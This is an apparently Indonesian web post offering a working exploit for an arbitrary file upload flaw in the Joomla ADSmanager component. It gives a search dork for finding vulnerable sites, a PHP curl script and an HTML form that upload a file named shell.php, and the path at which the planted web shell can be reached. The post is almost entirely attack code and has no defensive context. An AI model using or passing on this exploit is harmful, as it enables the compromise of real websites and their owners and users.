Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability
Oleh
chmood
Joomla ADSmanager Exploit Arbitrary File Upload Vulnerabilit
Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org
CODE PHP :<?php$url = “blabla.com/index.php?option=com_adsmanager&task=upload&tmpl=component”; // put URL Here$post = array(“file” => “@shell.jpg”,“name” => “shell.php”);$ch = curl_init (“$url“);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt ($ch, CURLOPT_USERAGENT, “Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0″);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);curl_setopt ($ch, CURLOPT_POST, 1);@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);$data = curl_exec ($ch);curl_close ($ch);echo $data;?>#CSRF :<form method=”POST” action=”TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component”enctype=”multipart/form-data”><input type=”file” name=”files[]” /><button>Upload</button></form>
Acces Shell: site.com/tmp/plupload/shell.php
Komentar